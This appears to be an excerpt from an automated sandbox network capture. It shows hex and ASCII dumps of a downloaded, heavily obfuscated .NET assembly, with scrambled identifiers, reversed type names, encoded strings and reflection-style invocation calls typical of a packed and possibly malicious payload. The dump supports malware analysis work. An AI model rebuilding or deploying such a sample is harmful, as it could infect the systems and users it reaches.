                                                                                                                                  2021-12-18 14:32:00 UTC64INData Raw: 28 a0 00 00 06 2a 00 00 00 3a 0e 03 0e 00 0e 01 0e 02 6f 24 06 00 06 2a 00 42 28 a9 00 00 06 d0 d0 00 00 02 28 a0 00 00 06 2a 00 00 00 32 0e 02 0e 00 0e 01 6f 28 06 00 06 2a 00 00 00 42 28 a9 00 00 06 d0 d1 00 00 02 28 a0 00 00 06 2a 00 00 00 3a 0e 03 0e 00 0e 01 0e 02 6f 2c 06 00 06 2a 00 42 28 a9 00 00 06 d0 d2 00 00 02 28 a0 00 00 06 2a 00 00 00 3a 0e 03 0e 00 0e 01 0e 02 6f 30 06 00 06 2a 00 42 28 a9 00 00 06 d0 d3 00 00 02 28 a0 00 00 06 2a 00 00 00 3a 0e 03 0e 00 0e 01 0e 02 6f 34 06 00 06 2a 00 42 28 a9 00 00 06 d0 d4 00 00 02 28 a0 00 00 06 2a 00 00 00 32 0e 02 0e 00 0e 01 6f 38 06 00 06 2a 00 00 00 42 28 a9 00 00 06 d0 d5 00 00 02 28 a0 00 00 06 2a 00 00 00 32 0e 02 0e 00 0e 01 6f 3c 06 00 06 2a 00 00 00 42 28 a9 00 00 06 d0 d6 00 00 02 28 a0 00
                                                                                                                                  Data Ascii: (*:o$*B((*2o(*B((*:o,*B((*:o0*B((*:o4*B((*2o8*B((*2o<*B((
                                                                                                                                  2021-12-18 14:32:00 UTC68INData Raw: b0 15 00 00 2d 00 fe 01 10 06 00 01 00 00 c4 15 00 00 2d 00 ff 01 14 06 00 01 00 00 d8 15 00 00 2d 00 01 02 18 06 00 01 00 00 ec 15 00 00 2d 00 02 02 1c 06 00 01 00 00 00 16 00 00 2d 00 03 02 20 06 00 01 00 00 14 16 00 00 2d 00 04 02 24 06 00 01 00 00 28 16 00 00 2d 00 05 02 28 06 00 01 00 00 3c 16 00 00 2d 00 06 02 2c 06 00 01 00 00 50 16 00 00 2d 00 07 02 30 06 00 01 00 00 64 16 00 00 2d 00 08 02 34 06 00 01 00 00 78 16 00 00 2d 00 09 02 38 06 00 01 00 00 8c 16 00 00 2d 00 0a 02 3c 06 00 01 00 00 a0 16 00 00 2d 00 0b 02 40 06 00 01 00 00 b4 16 00 00 2d 00 0c 02 44 06 11 00 cf 16 3b 01 11 00 2c 17 4e 01 06 00 cc 17 7a 01 13 00 9c 18 7f 01 11 00 5e 19 ee 01 16 00 8d 19 f1 01 13 00 ae 19 f4 01 01 00 40 1a 06 02 11 00 63 1a 09 02 16 00 b5 1b 56 02 11 00 bc
                                                                                                                                  Data Ascii: ----- -$(-(<-,P-0d-4x-8-<-@-D;,Nz^@cV
                                                                                                                                  2021-12-18 14:32:00 UTC72INData Raw: 01 1a 00 00 00 00 00 03 00 c6 01 59 18 50 04 1c 00 00 00 00 00 03 00 c6 01 be 21 57 04 1f 00 00 00 00 00 03 00 c6 01 ee 21 64 04 23 00 c0 23 00 00 00 00 91 18 c8 16 37 01 26 00 00 00 00 00 03 00 86 18 54 00 65 01 26 00 00 00 00 00 03 00 c6 01 59 18 6f 04 28 00 00 00 00 00 03 00 c6 01 be 21 78 04 2e 00 00 00 00 00 03 00 c6 01 ee 21 87 04 35 00 c8 23 00 00 00 00 91 18 c8 16 37 01 37 00 00 00 00 00 03 00 86 18 54 00 65 01 37 00 00 00 00 00 03 00 c6 01 59 18 90 04 39 00 00 00 00 00 03 00 c6 01 be 21 96 04 3c 00 00 00 00 00 03 00 c6 01 ee 21 87 04 40 00 d0 23 00 00 00 00 91 18 c8 16 37 01 42 00 00 00 00 00 03 00 86 18 54 00 65 01 42 00 00 00 00 00 03 00 c6 01 59 18 a2 04 44 00 00 00 00 00 03 00 c6 01 be 21 a7 04 46 00 00 00 00 00 03 00 c6 01 ee 21 87 04 49 00
                                                                                                                                  Data Ascii: YP!W!d##7&Te&Yo(!x.!5#77Te7Y9!<!@#7BTeBYD!F!I
                                                                                                                                  2021-12-18 14:32:00 UTC76INData Raw: 9a 01 f0 e9 00 00 08 00 93 00 55 3e 75 01 9a 01 fc e9 00 00 08 00 93 00 68 3e 31 0d 9a 01 0c ea 00 00 08 00 93 00 7b 3e 74 09 9b 01 18 ea 00 00 08 00 93 00 8e 3e 45 01 9b 01 20 ea 00 00 08 00 93 00 a1 3e 65 0a 9b 01 24 ea 00 00 08 00 91 00 b4 3e 37 0d 9b 01 34 ea 00 00 08 00 91 00 ce 3e 44 0d 9d 01 44 ea 00 00 08 00 91 00 d9 3e 52 0d a0 01 54 ea 00 00 08 00 91 00 e4 3e 5e 0d a3 01 64 ea 00 00 08 00 91 00 ef 3e 67 0d a6 01 74 ea 00 00 08 00 91 00 fa 3e 77 0d a9 01 84 ea 00 00 08 00 96 00 05 3f 89 0d ac 01 8c ea 00 00 08 00 91 00 10 3f 90 0d ae 01 9c ea 00 00 08 00 93 00 1b 3f ba 0d b1 01 a4 ea 00 00 08 00 96 00 26 3f c0 0d b2 01 b4 ea 00 00 08 00 86 18 54 00 d7 00 b4 01 bc ea 00 00 00 00 91 18 c8 16 37 01 b4 01 c4 ea 00 00 08 00 93 00 9d 3f d9 0d b4 01 cc
                                                                                                                                  Data Ascii: U>uh>1{>t>E >e$>74>DD>RT>^d>gt>w???&?T7?
                                                                                                                                  2021-12-18 14:32:00 UTC80INData Raw: 02 8c f7 00 00 08 00 86 00 1c 47 73 0f 26 02 9c f7 00 00 08 00 c6 00 4b 43 73 0f 27 02 ac f7 00 00 08 00 86 00 27 47 73 0f 28 02 bc f7 00 00 08 00 c6 00 56 43 73 0f 29 02 cc f7 00 00 08 00 86 00 32 47 73 0f 2a 02 dc f7 00 00 08 00 c6 00 61 43 73 0f 2b 02 ec f7 00 00 08 00 c6 00 6c 43 73 0f 2c 02 fc f7 00 00 08 00 c6 00 77 43 73 0f 2d 02 0c f8 00 00 08 00 c6 00 82 43 73 0f 2e 02 1c f8 00 00 08 00 86 00 3d 47 73 0f 2f 02 2c f8 00 00 08 00 c6 00 8d 43 73 0f 30 02 3c f8 00 00 08 00 86 00 48 47 73 0f 31 02 4c f8 00 00 08 00 c6 00 98 43 73 0f 32 02 5c f8 00 00 08 00 86 00 53 47 73 0f 33 02 6c f8 00 00 08 00 c6 00 a3 43 73 0f 34 02 7c f8 00 00 08 00 86 00 5e 47 73 0f 35 02 8c f8 00 00 08 00 c6 00 ae 43 73 0f 36 02 9c f8 00 00 08 00 c6 00 b9 43 73 0f 37 02 ac f8
                                                                                                                                  Data Ascii: Gs&KCs''Gs(VCs)2Gs*aCs+lCs,wCs-Cs.=Gs/,Cs0<HGs1LCs2\SGs3lCs4|^Gs5Cs6Cs7
                                                                                                                                  2021-12-18 14:32:00 UTC84INData Raw: 24 01 01 00 08 00 c3 02 46 41 83 01 b0 02 2c 01 01 00 08 00 93 00 d6 4b 45 01 b0 02 34 01 01 00 08 00 93 00 ea 4b de 10 b0 02 3c 01 01 00 08 00 93 00 fe 4b 74 09 b0 02 44 01 01 00 08 00 93 00 12 4c c2 0a b0 02 4c 01 01 00 08 00 93 00 26 4c c2 0a b0 02 54 01 01 00 00 00 91 18 c8 16 37 01 b0 02 5c 01 01 00 08 00 86 18 54 00 f3 10 b0 02 64 01 01 00 08 00 c3 02 60 4a 52 05 b2 02 70 01 01 00 08 00 c3 02 e3 40 fd 0e b2 02 80 01 01 00 08 00 c3 02 ee 40 fd 0e b3 02 88 01 01 00 08 00 c3 02 6b 4a fd 0e b4 02 90 01 01 00 08 00 c3 02 25 41 40 0f b5 02 a0 01 01 00 08 00 c3 02 fb 43 6d 0f b6 02 a8 01 01 00 08 00 c3 02 06 44 83 01 b6 02 b0 01 01 00 08 00 c3 02 11 44 7c 0f b6 02 c0 01 01 00 08 00 c3 02 27 44 7c 0f b7 02 d0 01 01 00 08 00 c3 02 46 41 83 01 b8 02 d8 01 01
                                                                                                                                  Data Ascii: $FA,KE4K<KtDLL&LT7\Td`JRp@@kJ%A@CmDD|'D|FA
                                                                                                                                  2021-12-18 14:32:00 UTC88INData Raw: 0d 01 00 08 00 16 00 4b 6c a5 18 33 03 00 00 00 00 03 00 06 18 54 00 65 01 33 03 c4 0d 01 00 08 00 10 18 c8 16 37 01 33 03 00 00 00 00 03 00 46 00 59 18 c1 16 33 03 d8 0d 01 00 08 00 16 00 4b 6c b3 18 33 03 00 00 00 00 03 00 06 18 54 00 65 01 33 03 e4 0d 01 00 08 00 10 18 c8 16 37 01 33 03 00 00 00 00 03 00 46 00 59 18 c0 18 33 03 f8 0d 01 00 08 00 16 00 4b 6c c5 18 33 03 00 00 00 00 03 00 06 18 54 00 65 01 33 03 04 0e 01 00 08 00 10 18 c8 16 37 01 33 03 00 00 00 00 03 00 46 00 59 18 0d 02 33 03 18 0e 01 00 08 00 16 00 4b 6c d2 18 33 03 00 00 00 00 03 00 06 18 54 00 65 01 33 03 24 0e 01 00 08 00 10 18 c8 16 37 01 33 03 00 00 00 00 03 00 46 00 59 18 b3 00 33 03 38 0e 01 00 08 00 16 00 4b 6c de 18 33 03 00 00 00 00 03 00 06 18 54 00 65 01 33 03 44 0e 01 00
                                                                                                                                  Data Ascii: Kl3Te373FY3Kl3Te373FY3Kl3Te373FY3Kl3Te3$73FY38Kl3Te3D
                                                                                                                                  2021-12-18 14:32:00 UTC92INData Raw: 01 00 08 00 10 18 c8 16 37 01 33 03 00 00 00 00 03 00 46 00 59 18 21 1f 33 03 d4 17 01 00 08 00 16 00 4b 6c 2b 1f 33 03 00 00 00 00 03 00 06 18 54 00 65 01 33 03 e4 17 01 00 08 00 10 18 c8 16 37 01 33 03 00 00 00 00 03 00 46 00 59 18 3d 1f 33 03 f8 17 01 00 08 00 16 00 4b 6c 48 1f 33 03 00 00 00 00 03 00 06 18 54 00 65 01 33 03 08 18 01 00 08 00 10 18 c8 16 37 01 33 03 00 00 00 00 03 00 46 00 59 18 5b 1f 33 03 1c 18 01 00 08 00 16 00 4b 6c 64 1f 33 03 00 00 00 00 03 00 06 18 54 00 65 01 33 03 2c 18 01 00 08 00 10 18 c8 16 37 01 33 03 00 00 00 00 03 00 46 00 59 18 75 1f 33 03 40 18 01 00 08 00 16 00 4b 6c 7e 1f 33 03 00 00 00 00 03 00 06 18 54 00 65 01 33 03 50 18 01 00 08 00 10 18 c8 16 37 01 33 03 00 00 00 00 03 00 46 00 59 18 8f 1f 33 03 64 18 01 00 08
                                                                                                                                  Data Ascii: 73FY!3Kl+3Te373FY=3KlH3Te373FY[3Kld3Te3,73FYu3@Kl~3Te3P73FY3d
                                                                                                                                  2021-12-18 14:32:00 UTC96INData Raw: 29 00 00 01 00 e1 29 00 00 01 00 e1 29 00 00 01 00 e1 29 00 00 02 00 e1 29 00 00 01 00 e1 29 00 00 02 00 e1 29 00 00 01 00 e1 29 00 00 01 00 e1 29 00 00 01 00 e1 29 00 00 01 00 e1 29 00 00 01 00 e1 29 00 00 01 00 e1 29 00 00 01 00 e1 29 00 00 01 00 e1 29 00 00 01 00 e1 29 00 00 01 00 e1 29 00 00 01 00 e1 29 00 00 01 00 e1 29 00 00 01 00 e1 29 00 00 01 00 e1 29 00 00 01 00 e1 29 00 00 01 00 e1 29 00 00 01 00 e1 29 00 00 01 00 e1 29 00 00 01 00 e1 29 00 00 01 00 e1 29 00 00 01 00 e1 29 00 00 01 00 e1 29 00 00 01 00 e1 29 00 00 01 00 e1 29 00 00 01 00 e1 29 00 00 01 00 e1 29 00 00 01 00 e1 29 00 00 01 00 e1 29 00 00 01 00 e1 29 00 00 01 00 e1 29 00 00 01 00 e1 29 00 00 01 00 e1 29 00 00 01 00 e1 29 00 00 01 00 e1 29 00 00 01 00 e1 29 00 00 01 00 e1 29 00 00
                                                                                                                                  Data Ascii: )))))))))))))))))))))))))))))))))))))))))))
                                                                                                                                  2021-12-18 14:32:00 UTC100INData Raw: f4 13 89 02 a6 72 74 08 89 02 b3 72 56 20 79 01 bf 72 5b 20 21 01 4b 2c 62 20 79 01 a7 2c 69 20 21 01 cb 72 83 01 21 01 d7 72 c6 07 21 01 ec 2f 91 0a 31 02 e6 72 70 20 31 02 2f 2e 83 07 31 02 ef 72 74 20 31 02 fa 72 78 20 21 01 05 73 83 01 71 00 10 73 7c 20 71 00 22 73 85 20 71 00 22 73 8d 20 71 00 22 73 95 20 71 00 22 73 9d 20 71 00 22 73 a5 20 71 00 22 73 ad 20 71 00 22 73 b5 20 71 00 22 73 bd 20 19 00 f5 2e 0d 02 b1 00 f5 2e 0d 02 89 00 f5 2e 0d 02 a9 00 f5 2e 0d 02 a1 00 52 72 c5 20 69 03 2b 73 cb 20 69 03 34 73 0e 07 61 03 f5 2e 0d 02 f1 00 f5 2e 0d 02 d1 01 f3 2c cf 20 d1 01 64 2f d5 20 81 01 8d 32 da 20 69 02 8d 32 e4 20 51 00 4a 4f 9f 07 79 00 3d 73 ee 20 79 00 ed 2e c6 07 21 01 50 73 0d 02 79 01 5d 73 f3 20 09 02 94 2a fa 20 79 01 6a 73 01 21 d1
                                                                                                                                  Data Ascii: rtrV yr[ !K,b y,i !r!r!/1rp 1/.1rt 1rx !sqs| q"s q"s q"s q"s q"s q"s q"s q"s ....Rr i+s i4sa.., d/ 2 i2 QJOy=s y.!Psy]s * yjs!
                                                                                                                                  2021-12-18 14:32:00 UTC104INData Raw: 6f 64 75 6c 65 3e 7b 38 43 33 33 33 32 34 46 2d 34 37 37 34 2d 34 45 37 43 2d 41 45 33 43 2d 45 37 33 35 39 39 31 45 42 39 35 46 7d 00 66 6f 75 73 79 72 31 4f 35 54 49 6d 65 68 4d 51 73 79 00 72 54 74 56 58 67 48 52 67 42 53 73 46 61 76 73 68 56 00 53 46 55 34 6d 62 54 33 47 4d 72 65 74 37 54 48 6f 6e 66 00 7a 32 6a 63 36 33 66 4c 6b 75 67 53 31 58 38 51 39 4e 00 53 47 39 4b 69 79 49 62 74 64 67 47 44 66 31 32 71 72 00 75 4b 74 76 4b 64 6b 42 6a 76 34 74 33 54 46 51 42 65 00 4e 69 66 76 64 70 74 68 58 79 5a 53 33 6a 38 58 78 45 00 41 74 74 72 69 62 75 74 65 00 6a 73 54 38 56 69 31 6e 71 57 32 6e 4d 36 46 4b 4b 43 4a 60 31 00 43 49 4b 42 59 35 5a 74 71 39 47 67 34 6f 45 35 56 55 00 76 62 68 76 36 59 75 42 4c 42 6e 5a 45 30 48 42 5a 55 00 58 43 42 30 73 38
                                                                                                                                  Data Ascii: odule>{8C33324F-4774-4E7C-AE3C-E735991EB95F}fousyr1O5TImehMQsyrTtVXgHRgBSsFavshVSFU4mbT3GMret7THonfz2jc63fLkugS1X8Q9NSG9KiyIbtdgGDf12qruKtvKdkBjv4t3TFQBeNifvdpthXyZS3j8XxEAttributejsT8Vi1nqW2nM6FKKCJ`1CIKBY5Ztq9Gg4oE5VUvbhv6YuBLBnZE0HBZUXCB0s8
                                                                                                                                  2021-12-18 14:32:00 UTC108INData Raw: 74 72 00 49 6e 76 6f 6b 65 00 6a 58 6e 6c 44 42 47 6b 38 33 4b 48 75 62 6a 4a 71 6a 64 00 6e 54 6d 66 51 33 47 6d 76 66 45 6b 69 35 42 65 66 48 36 00 68 66 59 56 43 30 47 58 6c 52 65 47 53 37 62 50 33 41 6f 00 6b 63 75 4c 74 44 52 53 64 36 50 55 6b 32 67 43 71 32 68 00 3c 72 65 6b 6f 76 6e 49 63 6e 79 53 6e 6f 69 74 61 69 74 6f 67 65 4e 74 73 6f 48 6e 6f 69 74 61 69 74 6f 67 65 4e 72 6f 74 61 63 69 74 6e 65 68 74 75 41 6e 65 6b 6f 54 6e 6f 69 74 61 69 74 6f 67 65 4e 79 74 69 72 75 63 65 53 6c 65 64 6f 4d 65 63 69 76 72 65 53 6d 65 74 73 79 53 37 37 31 36 3e 62 5f 5f 30 00 55 49 6e 74 36 34 00 55 49 6e 74 33 32 00 42 79 74 65 00 55 49 6e 74 31 36 00 5a 65 72 6f 00 66 55 6e 33 57 79 52 62 72 59 73 53 43 62 53 65 6f 4c 36 00 72 48 42 6e 6b 45 52 44 4e 35 69
                                                                                                                                  Data Ascii: trInvokejXnlDBGk83KHubjJqjdnTmfQ3GmvfEki5BefH6hfYVC0GXlReGS7bP3AokcuLtDRSd6PUk2gCq2h<rekovnIcnySnoitaitogeNtsoHnoitaitogeNrotacitnehtuAnekoTnoitaitogeNytiruceSledoMecivreSmetsyS7716>b__0UInt64UInt32ByteUInt16ZerofUn3WyRbrYsSCbSeoL6rHBnkERDN5i
                                                                                                                                  2021-12-18 14:32:00 UTC112INData Raw: 58 42 00 66 4b 55 31 77 69 4a 51 47 59 00 70 41 4c 31 30 53 4b 43 6f 43 00 44 69 63 74 69 6f 6e 61 72 79 60 32 00 56 79 4e 31 35 4c 71 6c 45 68 00 48 71 41 31 6f 74 46 44 63 4a 00 4a 38 74 31 76 45 63 55 42 49 00 57 42 31 31 74 52 49 5a 78 50 00 47 65 74 54 79 70 65 46 72 6f 6d 48 61 6e 64 6c 65 00 52 75 6e 74 69 6d 65 54 79 70 65 48 61 6e 64 6c 65 00 67 65 74 5f 41 73 73 65 6d 62 6c 79 00 52 75 6e 74 69 6d 65 48 65 6c 70 65 72 73 00 49 6e 69 74 69 61 6c 69 7a 65 41 72 72 61 79 00 41 72 72 61 79 00 52 75 6e 74 69 6d 65 46 69 65 6c 64 48 61 6e 64 6c 65 00 45 6e 63 6f 64 69 6e 67 00 67 65 74 5f 55 6e 69 63 6f 64 65 00 47 65 74 53 74 72 69 6e 67 00 73 65 74 5f 55 73 65 4d 61 63 68 69 6e 65 4b 65 79 53 74 6f 72 65 00 62 4b 54 30 63 74 63 55 49 32 00 48 49 6d
                                                                                                                                  Data Ascii: XBfKU1wiJQGYpAL10SKCoCDictionary`2VyN15LqlEhHqA1otFDcJJ8t1vEcUBIWB11tRIZxPGetTypeFromHandleRuntimeTypeHandleget_AssemblyRuntimeHelpersInitializeArrayArrayRuntimeFieldHandleEncodingget_UnicodeGetStringset_UseMachineKeyStorebKT0ctcUI2HIm
                                                                                                                                  2021-12-18 14:32:00 UTC116INData Raw: 6b 44 37 4b 35 42 46 52 68 4f 43 53 6e 62 6c 79 71 00 74 77 77 44 6c 69 35 74 59 75 36 44 47 78 57 6e 48 4f 56 00 67 65 74 5f 4d 61 6e 69 66 65 73 74 4d 6f 64 75 6c 65 00 6d 74 71 32 77 53 35 37 6c 4f 4b 65 46 51 48 76 32 62 38 00 67 65 74 5f 4d 6f 64 75 6c 65 48 61 6e 64 6c 65 00 48 35 47 51 48 52 35 78 49 79 48 32 59 62 51 32 38 56 59 00 65 53 35 47 36 75 35 6a 43 54 4b 48 58 79 37 39 67 6e 43 00 47 57 70 6b 64 4e 35 4b 63 73 77 4b 6c 52 54 71 46 50 31 00 6e 33 72 41 77 50 35 32 47 52 38 36 73 4f 57 6e 32 72 61 00 50 72 65 70 61 72 65 44 65 6c 65 67 61 74 65 00 6d 32 42 42 32 4e 35 4f 4a 55 41 4f 79 64 47 36 59 54 50 00 52 75 6e 74 69 6d 65 4d 65 74 68 6f 64 48 61 6e 64 6c 65 00 67 65 74 5f 4d 65 74 68 6f 64 48 61 6e 64 6c 65 00 6a 4b 51 6a 52 42 35 49
                                                                                                                                  Data Ascii: kD7K5BFRhOCSnblyqtwwDli5tYu6DGxWnHOVget_ManifestModulemtq2wS57lOKeFQHv2b8get_ModuleHandleH5GQHR5xIyH2YbQ28VYeS5G6u5jCTKHXy79gnCGWpkdN5KcswKlRTqFP1n3rAwP52GR86sOWn2raPrepareDelegatem2BB2N5OJUAOydG6YTPRuntimeMethodHandleget_MethodHandlejKQjRB5I
                                                                                                                                  2021-12-18 14:32:00 UTC120INData Raw: 6e 4a 52 70 4c 78 6f 46 6e 00 49 67 79 69 38 31 4c 33 50 46 00 4d 4c 38 69 43 51 69 56 47 36 00 52 69 72 51 4f 6c 73 6e 45 75 4f 58 49 4a 6e 41 78 6f 58 00 48 32 6c 72 51 73 73 4d 47 74 44 71 53 67 4d 4f 51 62 61 00 53 50 6e 49 57 58 73 67 31 31 69 30 5a 6d 36 46 30 68 34 00 71 6d 32 66 38 37 73 53 79 79 62 4d 50 37 65 62 63 43 64 00 42 50 4f 69 45 68 62 36 4e 63 00 7a 6b 72 69 53 61 39 4b 70 64 00 58 64 47 69 48 72 4d 68 6f 69 00 7a 47 67 53 52 6f 73 62 75 55 4c 33 67 67 66 76 34 35 55 00 62 61 69 53 59 4d 73 44 30 37 6c 78 50 6a 6e 33 49 67 57 00 6b 74 45 69 6a 30 68 51 37 79 00 58 6e 4c 69 61 62 50 53 41 49 00 4c 75 32 49 39 53 73 71 34 31 4f 50 55 64 76 66 37 46 4b 00 4e 6f 74 49 6d 70 6c 65 6d 65 6e 74 65 64 45 78 63 65 70 74 69 6f 6e 00 52 78 6b 52
                                                                                                                                  Data Ascii: nJRpLxoFnIgyi81L3PFML8iCQiVG6RirQOlsnEuOXIJnAxoXH2lrQssMGtDqSgMOQbaSPnIWXsg11i0Zm6F0h4qm2f87sSyybMP7ebcCdBPOiEhb6NczkriSa9KpdXdGiHrMhoizGgSRosbuUL3ggfv45UbaiSYMsD07lxPjn3IgWktEij0hQ7yXnLiabPSAILu2I9Ssq41OPUdvf7FKNotImplementedExceptionRxkR
                                                                                                                                  2021-12-18 14:32:00 UTC124INData Raw: 42 37 32 34 37 43 34 39 37 37 38 38 43 46 30 30 33 31 43 45 42 30 36 45 33 44 46 37 37 41 34 35 46 45 46 35 39 46 31 45 34 39 36 33 33 44 43 37 31 35 39 38 31 36 44 36 34 37 35 39 42 35 00 6d 5f 32 38 36 36 61 37 31 36 33 36 35 32 34 34 35 36 38 64 35 35 32 63 32 37 61 63 66 38 39 62 30 39 00 6d 5f 65 66 35 37 32 32 62 33 35 62 61 62 34 34 66 31 62 35 32 37 64 32 34 34 31 61 61 62 63 30 62 39 00 6d 5f 63 62 32 66 36 32 30 35 61 32 30 36 34 30 62 64 61 39 64 31 62 35 64 30 62 33 39 61 61 63 66 34 00 6d 5f 32 30 66 31 66 65 33 66 30 39 33 62 34 33 31 39 61 64 37 39 33 38 39 35 33 66 65 35 30 31 64 64 00 6d 5f 32 33 36 39 61 36 65 65 62 64 37 64 34 38 39 61 61 37 64 64 66 33 64 64 32 64 35 39 38 33 35 34 00 6d 5f 63 62 63 65 33 35 36 30 64 62 63 62 34 61 31
                                                                                                                                  Data Ascii: B7247C497788CF0031CEB06E3DF77A45FEF59F1E49633DC7159816D64759B5m_2866a716365244568d552c27acf89b09m_ef5722b35bab44f1b527d2441aabc0b9m_cb2f6205a20640bda9d1b5d0b39aacf4m_20f1fe3f093b4319ad7938953fe501ddm_2369a6eebd7d489aa7ddf3dd2d598354m_cbce3560dbcb4a1
                                                                                                                                  2021-12-18 14:32:00 UTC128INData Raw: 35 36 66 63 61 34 31 63 65 65 61 62 00 6d 5f 34 62 65 35 66 63 37 64 37 35 33 63 34 65 37 33 38 61 33 63 35 32 33 37 66 37 36 38 32 39 36 66 00 6d 5f 39 62 31 39 65 39 66 39 30 39 65 35 34 62 38 39 62 61 62 39 39 31 66 35 34 38 38 66 62 33 66 30 00 6d 5f 30 62 34 34 34 35 33 37 34 62 39 65 34 39 39 61 61 36 37 36 62 61 65 36 64 36 65 37 34 33 39 65 00 6d 5f 62 31 31 64 62 61 31 30 30 35 64 63 34 33 61 34 62 64 30 35 66 38 37 32 30 62 34 37 32 63 36 30 00 6d 5f 31 38 61 65 39 32 64 62 33 33 65 32 34 39 65 32 39 38 37 34 38 38 37 33 38 32 62 65 63 62 63 30 00 6d 5f 32 30 63 63 62 36 30 37 30 35 33 31 34 31 35 30 62 30 63 38 34 34 33 63 36 33 61 39 64 33 37 35 00 6d 5f 63 35 62 30 39 36 36 65 65 66 32 64 34 63 38 30 62 66 30 66 38 65 66 61 36 63 32 38 33 36
                                                                                                                                  Data Ascii: 56fca41ceeabm_4be5fc7d753c4e738a3c5237f768296fm_9b19e9f909e54b89bab991f5488fb3f0m_0b4445374b9e499aa676bae6d6e7439em_b11dba1005dc43a4bd05f8720b472c60m_18ae92db33e249e29874887382becbc0m_20ccb60705314150b0c8443c63a9d375m_c5b0966eef2d4c80bf0f8efa6c2836
                                                                                                                                  2021-12-18 14:32:00 UTC132INData Raw: 00 43 00 67 00 6e 00 69 00 6c 00 64 00 49 00 73 00 6c 00 65 00 6e 00 6e 00 61 00 68 00 43 00 6c 00 65 00 64 00 6f 00 4d 00 65 00 63 00 69 00 76 00 72 00 65 00 53 00 6d 00 65 00 74 00 73 00 79 00 53 00 36 00 34 00 39 00 30 00 58 00 51 00 75 00 4c 00 42 00 64 00 48 00 4e 00 7a 00 77 00 58 00 4c 00 6b 00 51 00 74 00 42 00 67 00 45 00 44 00 5a 00 77 00 3d 00 3d 00 00 80 8f 42 00 69 00 74 00 61 00 63 00 69 00 6e 00 75 00 6d 00 6d 00 6f 00 43 00 67 00 6e 00 69 00 6c 00 64 00 49 00 73 00 6c 00 65 00 6e 00 6e 00 61 00 68 00 43 00 6c 00 65 00 64 00 6f 00 4d 00 65 00 63 00 69 00 76 00 72 00 65 00 53 00 6d 00 65 00 74 00 73 00 79 00 53 00 36 00 34 00 39 00 30 00 58 00 51 00 41 00 49 00 78 00 59 00 59 00 4e 00 77 00 59 00 44 00 41 00 7a 00 67 00 7a 00 50 00 67 00 45
                                                                                                                                  Data Ascii: CgnildIslennahCledoMecivreSmetsyS6490XQuLBdHNzwXLkQtBgEDZw==BitacinummoCgnildIslennahCledoMecivreSmetsyS6490XQAIxYYNwYDAzgzPgE
                                                                                                                                  2021-12-18 14:32:00 UTC136INData Raw: 00 54 00 68 00 41 00 75 00 57 00 61 00 69 00 78 00 61 00 2e 00 64 00 4d 00 72 00 43 00 65 00 58 00 35 00 4d 00 4a 00 78 00 4a 00 35 00 38 00 31 00 4c 00 44 00 38 00 61 00 00 00 79 08 e1 87 80 27 93 45 bd fc de a1 ec 06 78 f3 00 80 9e 2e 01 80 84 53 79 73 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 50 65 72 6d 69 73 73 69 6f 6e 73 2e 53 65 63 75 72 69 74 79 50 65 72 6d 69 73 73 69 6f 6e 41 74 74 72 69 62 75 74 65 2c 20 6d 73 63 6f 72 6c 69 62 2c 20 56 65 72 73 69 6f 6e 3d 34 2e 30 2e 30 2e 30 2c 20 43 75 6c 74 75 72 65 3d 6e 65 75 74 72 61 6c 2c 20 50 75 62 6c 69 63 4b 65 79 54 6f 6b 65 6e 3d 62 37 37 61 35 63 35 36 31 39 33 34 65 30 38 39 15 01 54 02 10 53 6b 69 70 56 65 72 69 66 69 63 61 74 69 6f 6e 01 08 01 00 08 00 00 00 00 00 08 b7 7a 5c 56 19 34 e0 89 04
                                                                                                                                  Data Ascii: ThAuWaixa.dMrCeX5MJxJ581LD8ay'Ex.System.Security.Permissions.SecurityPermissionAttribute, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089TSkipVerificationz\V4
                                                                                                                                  2021-12-18 14:32:00 UTC140INData Raw: 01 0c 11 81 14 05 00 00 12 81 10 04 06 12 81 1c 05 00 00 12 81 1c 04 06 12 81 20 05 00 00 12 81 20 04 06 11 81 74 04 06 12 81 24 04 07 02 1c 03 05 00 00 12 81 24 04 06 12 81 28 05 00 00 12 81 28 04 06 12 81 6c 04 06 12 81 2c 07 20 02 01 08 12 81 6c 09 07 03 12 81 44 08 12 81 7c 05 00 00 12 81 2c 04 06 12 80 e9 04 06 12 81 30 07 20 02 01 08 12 80 e9 05 07 01 12 81 30 05 00 00 12 81 30 04 06 12 80 c1 04 06 12 81 34 07 20 02 01 12 80 c1 1c 05 07 01 12 81 34 05 00 00 12 81 34 04 06 12 81 38 05 00 00 12 81 38 04 06 12 81 7c 04 06 12 80 91 04 06 12 81 3c 09 20 02 01 12 81 7c 12 80 91 05 07 01 12 81 3c 05 00 00 12 81 3c 04 06 12 81 40 05 00 00 12 81 40 04 06 12 81 44 05 00 00 12 81 44 04 06 12 81 4c 04 06 12 81 48 05 00 00 12 81 48 05 00 00 12 81 4c 04 06 12 81
                                                                                                                                  Data Ascii: t$$((l, lD|,0 004 4488|< |<<@@DDLHHL
                                                                                                                                  2021-12-18 14:32:00 UTC144INData Raw: 02 1c 12 80 91 0b 05 00 01 0f 01 18 03 20 00 0b 05 20 02 01 1c 08 04 20 01 1c 08 09 00 02 02 12 80 c1 12 80 c1 09 00 02 02 12 81 35 12 81 35 04 20 00 12 3d 06 20 01 12 80 c1 08 06 00 01 1c 12 80 91 06 20 01 12 81 31 08 09 00 02 12 80 e9 12 80 91 08 04 20 01 0e 08 06 20 01 02 12 80 91 04 00 01 02 0d 09 20 02 01 11 81 3d 12 80 91 08 20 01 12 81 d9 12 80 91 09 20 02 01 11 81 3d 12 81 d9 0d 20 03 01 11 81 3d 12 80 c5 1d 12 80 91 09 20 02 01 11 81 3d 12 81 c9 09 20 02 01 11 81 3d 12 80 c1 07 20 02 01 11 81 3d 04 04 20 01 08 08 05 20 00 11 80 ed 05 20 00 11 80 e1 04 01 00 00 00 0c 01 00 03 00 00 00 02 00 00 00 00 00 09 20 02 01 11 82 09 11 82 0d 80 b5 01 00 50 80 ae 53 47 39 4b 69 79 49 62 74 64 67 47 44 66 31 32 71 72 2e 7a 32 6a 63 36 33 66 4c 6b 75 67 53 31
                                                                                                                                  Data Ascii: 55 = 1 = = = = = = PSG9KiyIbtdgGDf12qr.z2jc63fLkugS1
